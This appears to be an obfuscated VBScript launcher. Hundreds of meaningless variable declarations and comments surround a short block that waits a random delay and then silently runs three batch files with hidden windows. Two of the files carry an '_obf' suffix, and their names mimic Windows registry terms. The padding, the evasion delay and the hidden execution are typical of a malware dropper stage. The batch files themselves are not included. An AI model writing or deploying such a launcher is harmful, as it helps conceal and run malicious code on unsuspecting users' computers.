Dim BWmdMQBrKK
rem hwLReHUGPh
Dim xodVvEmohm
rem jKWsijHNWI
Dim FpPMGgrxyw
rem YpNqSBVRxz
Dim ZSaLgtEksu
rem gFqTrXYLKz
Dim axnrlrzRjg
rem NYWDlWtPXm
Dim LvtGJUKCnM
rem PlmkDswIbu
Dim RhlSfbwsMe
rem gBeiMHIDZZ
Dim DXqQdmpOBO
rem QhCjcDCcBt
Dim eJVNrjenpF
rem METtJSSQHP
Dim kGniiWQFid
rem kZsKjaKlXo
Dim HGffdZIazN
rem UHbHFkNCyc
Dim RyueLMuvOV
rem hqUdsgSepb
Dim caoJmJTXkV
rem bdXTVfEqCw
Dim qBZUonLhof
rem GcQbFKxodV
Dim vEmohmjKWs
rem ijHNWIFpPM
Dim GgrxywYpNq
rem SBVRxzZSaL
Dim FTILTOFVyj
rem yokdbhZguy
Dim LyhIJFtjnC
rem MnYQoMceYB
Dim akbpunQMML
rem VzelEPOHLX
Dim FZezdDGrSH
rem damCYYVoxW
Dim RMxmsmWGpJ
rem ECqRsTDars
Dim zKDvwVdUiT
rem aXCWNQKBuJ
Dim HoXVHuKYzc
rem JZbLpwNNDD
Dim RYmthslNZN
rem VKspgEIhPS
Dim cdOPQqGxkR
rem TFXSwZEtvb
Dim WbjpLqZuoi
rem qFUyqfxrUk
Dim vvcHvDNRXE
rem BcfwRqPUMv
Dim GWJbozHKas
rem nlBwSnBGzg
Dim gejxtxCrrI
rem fiUXtdFTIL
Dim TOFVyjyokd
rem bhZguyLyhI
Dim JFtjnCMnYQ
rem oMceYBakbp
Dim unQMMLVzel
rem EPOHLXFZez
Dim dDGrSHdamC
rem YYVoxWRMxm
Dim smWGpJECqR
rem sTDarszKDv
Dim wVdUiTaXCW
rem NQKBuJHoXV
Dim HuKYzcJZbL
rem pwNNDDRYmt
Dim hslNZNVKsp
rem gEIhPScdOP
Dim QqGxkRTFXS
rem wZEtvbWbjp
Dim LqZuoiqFUy
rem qfxrUkvvcH
Dim vDNRXEBcfw
rem RqPUMvGWJb
Dim ozHKasnlBw
rem SnBGzggejx
Dim txCrrIfiUX
rem tdFTILTOFV
Dim jMkyWwvKOJ
rem gkpkLDnbIW
Dim ytpymBzqwG
rem mEuXuTgxVp
Dim qotlGCPFDc
rem praPHkxNbU
Dim NdxRCtmQtz
rem jrfpiVUVrc
Dim TdetTeUmNu
rem YIknNgiZxS
Dim MmussrRBoE
rem gdcyrZdfoQ
Dim lvnOvpzhEE
rem aaeQCOLIXR
Dim PRtoUTKeSK
rem FNwwFGVTcj
Dim XflbsNiPeO
rem huquMzoYOf
Dim zMYaSjTHjU
rem QWhgwchaEe
Dim rPZvJhfYGS
rem qgcqnvyldn
Dim RIyCZiBxEb
rem kJKHWiIisU
Dim YDJLQsOwbm
rem SolFaZjMky
Dim WwvKOJgkpk
rem LDnbIWytpy
Dim mBzqwGmEuX
rem uTgxVpqotl
Dim GCPFDcpraP
rem HkxNbUNdxR
Dim CtmQtzjrfp
rem iVUVrcTdet
Dim TeUmNuYIkn
rem NgiZxSMmus
Dim srRBoEgdcy
rem rZdfoQlvnO
Dim vpzhEEaaeQ
rem COLIXRPRto
Dim UTKeSKFNww
rem FGVTcjXflb
Dim sNiPeOhuqu
rem MzoYOfzMYa
Dim XKiaJkXoGG
rem eRGtIDySUe
Dim aHDjBXxGEy
rem uPgLRuOlgp
Dim UHsgUELabN
rem nJmJTkkCad
Dim XzmfZMCwMV
rem ZYKnKhoePc
Dim QbFKwKcCuZ
rem mngTxgWrhx
Dim eNMUOoPiFg
rem rxxwTLNpSV
Dim VEwzZQNLfs
rem EksRfOqTWW
Dim YhJyDxHqkq
rem yEiuSTjSlM
Dim tOklKvtFHY
rem fXdMOzTyIr
Dim vUFuRhzYRF
rem vWLeumPwiH
Dim IUttDWpmcl
rem pIQIYvlibS
Dim CcBsefVBrj
rem EJoDMZzsHQ
Dim SmGOyPdivj
rem QFhdjZXKia
Dim JkXoGGeRGt
rem IDySUeaHDj
Dim BXxGEyuPgL
rem RuOlgpUHsg
Dim UELabNnJmJ
rem TkkCadXzmf
Dim ZMCwMVZYKn
rem KhoePcQbFK
Dim wKcCuZmngT
rem xgWrhxeNMU
Dim OoPiFgrxxw
rem TLNpSVVEwz
Dim OBRoJIPWUf
rem JDTlqrmLnj
Dim aidYXYkeMf
rem NmMNXqIFWC
Dim ogIbdQJsxp
rem DllkDUhSbf
Dim eKkQfahrpG
rem gVGiLcSSOO
Dim NrTVwCzDBD
rem mgXLvNsvZI
Dim GHtEYMenza
rem pPlIdBBVcF
Dim jFxLhWVaLw
rem WOrnMRnXry
Dim cbHecOSNkB
rem QGucaWEsjb
Dim PjfGKpfgDC
rem KTQcUJQPou
Dim vRydCdlXWt
rem RwrlCHPqsh
Dim pZOQnxoKyH
rem GvVuaniowt
Dim gPCyKmiJqU
rem LjHEqSFzFM
Dim bJYijhmpEz
rem BZteikOBRo
Dim JIPWUfJDTl
rem qrmLnjaidY
Dim XYkeMfNmMN
rem XqIFWCogIb
Dim dQJsxpDllk
rem DUhSbfeKkQ
Dim DZGywBFqBH
rem cRCXmmtyiq

Dim max,min
max=10000
min=11000
Dim RNDM
Randomize
RNDM=((max)*Rnd+min)
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "ControlSet001_obf.bat" & Chr(34), 0
Set WshShell = Nothing
wscript.sleep (RNDM)

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "compil32_obf.bat" & Chr(34), 0
Set WshShell = Nothing
wscript.sleep (1000)

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "ControlSet002.bat" & Chr(34), 0
Set WshShell = Nothing
wscript.sleep (1000)
wscript.quit

Dim HTMtUtrcTx
rem GImHSCRuQS
Dim XyNgLOiBpC
rem fUIYeZoEJx
Dim cyUOwJyVlh
rem xFgzlLeeRa
Dim eVtOoIsRFe
rem OySlneNobE
Dim viabZTvMrf
rem CusNiFGDKg
Dim YgqzymFJkp
rem YuBjmdjQBr
Dim gKhwKREHUG
rem PhdhHmbBTK
Dim vqdvkXwnRS
rem jsZLExPvXn
Dim ncqiDMIQQN
rem dpBUDiuCNz
Dim CauZWqkkrw
rem goOnfWzWoN
Dim xbIqyITjVZ
rem zThcCPfrul
Dim JjZpqotXcs
rem PbawpraPck
Dim iEbYEdxfts
rem VVOkMYHTMt
Dim UtrcTxGImH
rem SCRuQSXyNg
Dim LOiBpCfUIY
rem eZoEJxcyUO
Dim wJyVlhxFgz
rem lLeeRaeVtO
Dim oIsRFeOySl
rem neNobEviab
Dim ZTvMrfCusN
rem iFGDKgYgqz
Dim ymFJkpYuBj
rem mdjQBrgKhw
Dim KREHUGPhdh
rem HmbBTKvqdv
Dim kXwnRSjsZL
rem ExPvXnncqi
Dim DMIQQNdpBU
rem DiuCNzCauZ
Dim WqkkrwgoOn
rem fWzWoNxbIq
Dim yITjVZzThc
rem CPfrulJjZp
Dim xvTpEzSZte
rem wzZQRLJIEk
Dim URfDTTqqmK
rem njaidTkYyE
Dim ifNmMNXqIO
rem WCogsFdQJs
Dim xpDllkSUvU
rem bfRhkQfahr
Dim LGgVFhLcSS
rem ItDrTmwlzI
Dim VDmgXLvSsv
rem ZIeHtEYjed
Dim zDpPzsHBBV
rem cFjFxihWVa
Dim LwjOrKMRJX
rem ryGbHecOIN
Dim kBQGuGNMZr
rem jbPyuPKoeu
Dim OCKTYcUfQP
rem ouuRyHCdlX
Dim WtRwrkCHOq
rem shpZOYnxKK
Dim yeGvQuFnio
rem wtgZlxgmiJ
Dim qUhiHEqSFz
rem PMbJYxxvTp
Dim EzSZtewzZQ
rem RLJIEkURfD
Dim TTqqmKnjai
rem dTkYyEifNm
Dim MNXqIOWCog
rem sFdQJsxpDl
Dim lkSUvUbfRh
rem kQfahrLGgV
Dim FhLcSSItDr
rem TmwlzIVDmg
Dim XLvSsvZIeH
rem tEYjedzDpP
Dim zsHBBVcFjF
rem xihWVaLwjO
Dim rKMRJXryGb
rem HecOINkBQG
Dim uGNMZrjbPy
rem uPKoeuOCKT
Dim YcUfQPouuR
rem yHCdlXWtRw
Dim rkCHOqshpZ
rem OYnxKKyeGv
Dim QuFniowtgZ
rem lxgmiJqUhi
Dim HEqSFzPMbJ
rem YxxvTpEzSZ
Dim tewzZQRLJI
rem EkURfDTTqq
Dim VoxWRMwmXm
rem keMJECqEsT
Dim DFrsyKIbwV
rem dUiTaXCWNQ
Dim gSuJeKXVHu
rem KYpcJtbLpw
Dim NBDONYlVhX
rem lDZNVKspgN
Dim IhPSGdOPQM
rem GxkaTFlUcZ
Dim EtvaWbiLKq
rem ZuoiWDUnpf
Dim nrUkbvcHvD
rem SRWEBcfcRq
Dim PUMvGjfGnz
rem HgDsnlQwSJ
Dim BGzfgejdtx
rem CrrIfiYXtd
Dim FTILTOFmyj
rem ookHbhVgay
Dim LyhIJPCjKC
rem LnYQLMceTB
Dim akFpunQijh
rem mzelBOOGik
Dim OBeodSPWSf
rem HamlYYVoxW
Dim RMwmXmkeMJ
rem ECqEsTDFrs
Dim yKIbwVdUiT
rem aXCWNQgSuJ
Dim BuyTEDuMhP
rem RmOvhGUUsC
Dim UMpTbyosmU
rem TukhaUXbVr
Dim ZeCVqwZHnI
rem LtoXemQlFO
Dim xOcvuimDgc
rem xtWfiNfjWn
Dim OFPEFsrSyQ
rem YPNPSiVWwF
Dim ZdNZgKEask
rem foqGrRYZKa
Dim aBdelHzjjX
rem NcWyletLXv
Dim LCtqJdggnE
rem ObTaIJvJbX
Dim RVzduzwfMq
rem vwPBLYInth
Dim DfqcdbpKBo
rem YCCEcnCYBg
Dim erVxrNRIpo
rem MMTgHxSwHp
Dim ypnBwRQziS
rem kLstjkKuXO
Dim GTeWcLIyzx
rem UqbrDRBuyT
Dim EDuMhPRmOv
rem hGUUsCUMpT
Dim byosmUTukh
rem aUXbVrZeCV
Dim qwZHnILtoX
rem emQlFOxOcv
Dim uimDgcxtWf
rem iNfjWnOFPE
Dim FsrSyQYPNP
rem SiVWwFZdNZ
Dim gKEaskfoqG
rem rRYZKaaBde
Dim XckWMsRvqk
rem CGOprgotIT
Dim dwJJxeFumR
rem Dnhnvsftlx
Dim flhJpYgiGZ
rem pQDyOLaHTw
Dim wvToZzQtsP
rem vytmEKHUZj
Dim YEeSzzpqlK
rem djNhcTjTxZ
Dim heBlLBWpUI
rem MXnfsDcmHr
Dim woDkkjSYuY
rem aeEgjmeNgq
Dim KFfCFhKbQQ
rem IsSqzlvkyU
Dim VSlfWLuQru
rem tUPGsZTiPd
Dim ySoOyrGVBC
rem bDiDwhgMCN
Dim KviIrJLEHW
rem qxFaGPbIUB
Dim jVmFRGNMZr
rem iaPxROJoeu
Dim IXJzYcYfQO
rem nRuExHXckW
Dim MsRvqkCGOp
rem rgotITdwJJ
Dim xeFumRDnhn
rem vsftlxflhJ